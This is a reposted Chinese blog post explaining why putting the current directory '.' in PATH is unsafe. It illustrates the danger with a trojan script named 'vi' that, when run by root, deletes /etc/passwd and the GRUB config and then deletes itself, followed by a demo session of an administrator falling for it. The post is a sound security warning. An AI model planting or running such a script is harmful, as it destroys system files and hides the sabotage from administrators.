shell安全防范

最新推荐文章于 2023-04-28 10:14:32 发布
最新推荐文章于 2023-04-28 10:14:32 发布
阅读量626 收藏
点赞数
分类专栏: Linux
原文地址:shell安全防范——慎将当前目录.加入PATH 作者:lovedboy
可能很多人都知道将.加入PATH路径是不安全的做法,但未必很多人知道这样的做法为什么不安全。下面鄙人(哈哈)通过一个实际的案例来说明。
   
    首先我们假设我们系统有一个mark和badboy用户,mark作为系统管理员,但badboy平时和mark不合,心生怨恨,他想要给mark的系统管理工作搞些破坏(这人好奸诈),于是badboy在自己的家目录下建立了一个破坏脚本。请看下面。
[badboy@localhost ~]$ pwd
/home/badboy
[badboy@localhost ~]$ cat vi
#!/bin/bash
/bin/vi    #执行正常的vi命令,mark不会发觉。
      case$(whoami) in #如果是root用户
    root)  #删除存放所用用户的密码文件(好邪恶)
                  rm -f  /etc/passwd   
                  #删除引导文件。重启后机器必须手工引导(这个更邪恶)
                  rm  -f  /boot/grub/grub.conf   
                  # 销毁证据,badboy的反侦察能力很强!
                  rm -f    /home/badboy/vi
                  ;;
esac

    如果哪天管理员mark 使用 suroot命令进入了badboy的家目录,并且执行了vi命令,badboy会奸笑的恭喜mark中招了。下面我演示一下mark中招的过程。

[mark@localhost ~]$ echo $PATH
:/usr/kerberos/bin:/usr/local/bin:/bin:/usr/bin:/home/mark/bin #.在当前目录并在首位。
[mark@localhost ~]$ suroot                                            #root将继承mark的PATH路径
口令:
[root@localhost mark]# cd /home/badboy
[root@localhost badboy]# viinfo             
the terrible things happend!!!

"info" [New] 1L, 31C written
[root@localhost badboy]# cat /etc/passwd
cat:/etc/passwd:没有那个文件或目录                 #passed已被删除
[root@localhost badboy]# cat /boot/grub/grub.conf
cat:/boot/grub/grub.conf: 没有那个文件或目录        #引导文件也已被删除
[root@localhost badboy]# ls 
info                                       #罪证也已被删除
 
  从上面的列子可以看出,将.加入 PATH 是很不安全的。呵呵。其次作为管理员,/etc/目录一定要备份奥,这个目录是灰常的重要哈。
Hyman行之
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
死磕shell系列----shell脚本变量与安全
liangkk的博客
04-28 1096
千呼万唤始出来,感谢老铁们的支持,加强了我的学习动力!!! 一、shell脚本变量概述 Shell 作为弱类型的动态解释型语言,不像 C++、JAVA 语言编程时需要事先声明变量,Shell给一个变量赋值,实际上就是定义了变量。在 Linux 支持的所有 shell 中,都可以用赋值符号(=)为变量赋值,Shell 变量为弱类型,定义变量不需要声明类型,不需要提前强制转换,但在使用时需要明确变量的类型,可以使用 Declare 指定类型。 Declare 常见参数有: +/- "-"可...
网络安全shell脚本与自动化
qianfeng_dashuju的博客
09-18 421
shell脚本与自动化 概述 什么是脚本? 脚本,是使用一种特定的描述性语言,依据一定的格式编写的可执行文件,又称作宏或批处理文件。 什么是shell? 命令解释器,负责接收用户输入的命令,进行解释将需要执行的操作传递给内核执行,并输出执行结果 当前系统所支持的shell有哪些? CentOS系统默认用户使用的shell为/bin/bash /etc/shells文件中保存了系统支持的shell种类 Bash Bourne again Shell是bsh的升级版也是应用最广泛的shell
shell安全脚本
balanceone的博客
04-10 3878
自动化禁止恶意IP访问 应用场景:防止恶意IP尝试ssh登录。 脚本说明:将密码输入错误超过4次的IP地址通过iptables防火墙阻止访问。 分析: 1)首先,需要知道ssh远程访问记录在哪个文件中/var/log/secure 2)其次,模拟远程访问输错密码,查看日志文件 Dec 26 11:34:53 agent1 sshd[3060]: Failed password for root from 192.168.211.1 port 2075 ssh2 3)再次,通过日志可以看到关键信息“Fai.
shell基础与web安全
LynnWonder
10-30 443
shell基础与web安全 文章目录shell基础与web安全shell是什么?Linux和unix有什么区别?unix/Linux系统架构shell 是什么?web安全shell概念现象如何实现的?出现webshell的根本原因防范被植入webshell shell是什么? Linux和unix有什么区别? references: Linux和UNIX的关系及区别(详解版) UNIX 与 Li...
shell-文件安全与权限
不负青春、不负卿
12-13 275
当你创建一个文件的时候,系统保存了有关该文件的全部信息,包括: • 文件的位置。 • 文件类型。 • 文件长度。 • 哪位用户拥有该文件,哪些用户可以访问该文件。 • i节点。 • 文件的修改时间。 • 文件的权限位。 一个文件权限由四部分组成 (第一个字符) - 普通文件 (接下来的三个字符) r w - 文件属主的权限 (再接下来的三个字符) r- - 同组用户的权限 (最后三个字符)...
常用shell 脚本,dos攻击防范
05-26
Dos攻击防范(自动屏蔽攻击IP).sh 一键部署等等 Linux系统发送告警脚本.sh MySQL数据库备份单循环.sh MySQL数据库备份多循环.sh nginx 访问访问日志按天切割.sh nginx.conf nginx访问日志分析脚本.sh shell....
250个shell脚本
07-05
本文档收集了250个实用的Shell脚本实例,涵盖了多个应用场景,包括系统管理、安全防护、数据库备份等核心知识点。 1. Dos攻击防范:通过监控Nginx的日志文件,检测到异常频繁的IP访问后,脚本会自动使用iptables...
109个shell脚本合计
08-10
1. Dos攻击防范(自动屏蔽攻击IP): 这个脚本通过分析Nginx的访问日志文件,找出在特定时间内访问次数超过预设阈值的IP地址,然后将其添加到iptables防火墙规则中,阻止进一步的访问。此外,它还记录了被屏蔽的IP...
100个shell脚本合集
11-19
【知识点详解】 ...这些shell脚本涵盖了Linux系统运维中的常见任务,对于提升运维效率和系统安全性有着重要作用。它们可以集成到自动化运维工具中,如Ansible、SaltStack等,实现更大规模的系统管理。
CVE-2018-3191 反弹shell
最新发布
05-18
本文将深入探讨反弹Shell的原理、CVE-2018-3191的细节以及防范措施。 **反弹Shell的原理** 反弹Shell是指攻击者通过利用目标系统上的漏洞,使其主动连接回攻击者的计算机,而不是攻击者直接连接到受害者的服务器。...
shell 安全脚本
wangl2014的专栏
12-14 229
HASH值 HASH值与文件名称,时间,大小等信息无关,仅与内容有关 MD5 SHA256 [root@zabbix-server day6]# md5sum /etc/passwd 79fe83db4691f58785700e02e3dd2b4a /etc/passwd [root@zabbix-server day6]# sha256sum /etc/passwd 112a1a0d9404d157ff13502e54efb2e2c15cc9325ae0c5c13418f3f53f98227e
linux安全shell命令,Linux安全基础:shell及一些基础命令(示例代码)
weixin_39655377的博客
05-13 135
1.什么是shellShell是用户和Linux操作系统之间的接口。Linux中有多种shell,其中缺省使用的是Bash。2.shell的分类(1)bashbash shell 是 Bourne shell 的一个免费版本,它是最早的 Unix shell,包括许多附加的特点。Bash 有可编辑的命令行,可以回查历史命令,支持 tab 键补齐以使用户避免输入长的文件名。(2)cshC shel...
SHELL-安全管控&SELINUX开关
weixin_38915451的博客
04-28 107
1.根据IP地址记录操作------------------------------IP=`who am i | awk '{print $NF}' | sed -e 's/[()]//g'` export HISTTIMEFORMAT=$USER@$IP %F %T export PROMPT_COMMAND="history 1 | logger -t cmd_log -p user.notice"
shell 文件安全性的保证
AaNiceMan的博客
02-16 204
监控Web站点目录(/var/html/www)下的所有文件是否被恶意篡改(文件内容被更改) 文件内容被改动了会有如下特征: 1.大小可能会变化 2.修改时间会变化 3.文件内容会变化。利用nd5sun指纹校验 4.增加或删除文件,对比每次监测前后的文件数量 第一步:在企业网站发布代码之后,即对所有网站数据建立初始指纹库和文件库,这个步骤很重要,没有基础的指纹 库,无法进行入侵监测 1.建立测试数...
Linux命令+shell脚本大全:改变安全性设置
Lee达森的博客
07-18 289
注意ls命令的-F选项,它能够在具有执行权限的文件名后。本节将告诉你如何更改文件和目录的已有权限、默认文件属主以及默认属组。用户账户必须是这个文件的属主,除了能够更换属组之外,还得是新组的成员。如果你已经创建了一个目录或文件,需要改变它的安全性设置,在Linux系统上有一些工具。最后,如果你的Linux系统采用和用户登录名匹配的组名,可以只用一个条目就改变二者。下一步,后面跟着的符号表示你是想在现有权限基础上增加权限(+),还是在现有权限基础。-h选项可以改变该文件的所有符号链接文件的所属关系。...
就这么简单!构建强大的WebShell防护体系
dfdhxb995397的博客
12-06 238
接触web安全中,例如上传一句话WebShell实现上传文件的功能,再通过上传的多功能WebShell,执行病毒文件最终创建远程连接账号,达到入侵目标服务器的效果。我们可以看到,webshell在整个过程中起到了决定性的作用,因此对WebShell的防御是Web安全防御体系中非常重要的一部分。那么如何构建强大的WebShell防护体系呢? 以下内容,从上传、文件写入和浏览三个方面...
9个好玩但有点危险的Bash Shell命令
mickjoust的技术小屋
12-11 8101
前言 前段时间重感冒,状态低迷,各项任务进度拖延严重,Blog更新更是非常滞后。 一个感悟:生病时人会有种无力感,想要做但真的很容易放弃。 所以,身体很重要,要花时间锻炼身体,花时间休息非常有必要。 回归正题,今天无意中看到一篇有趣的文章《9 Evil Bash Commands Explained 》,突然想到每年都频发的多起“删库跑路事件“”,有的命令虽然好玩,但异常危险!千万不要让你的好奇心...
shell防止黑客攻击
ZZULI_Lucas的博客
11-06 422
shell防止黑客攻击 #!bin/bash #******************************************************************** while : ;do iplist=`who | sed -rn '/^cracker/s/.*\((.*)\)/\1/p'` #取出以cracker开头的黑客IP地址 i...
如何防范反弹shell
06-08
为了防范反弹shell攻击,可以采取以下措施: 1. 更新系统补丁和安全软件:保持系统和软件更新,及时安装安全补丁,可以减少安全漏洞,从而减少攻击者利用反弹shell攻击的可能性。 2. 禁用不必要的服务和端口:关闭...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值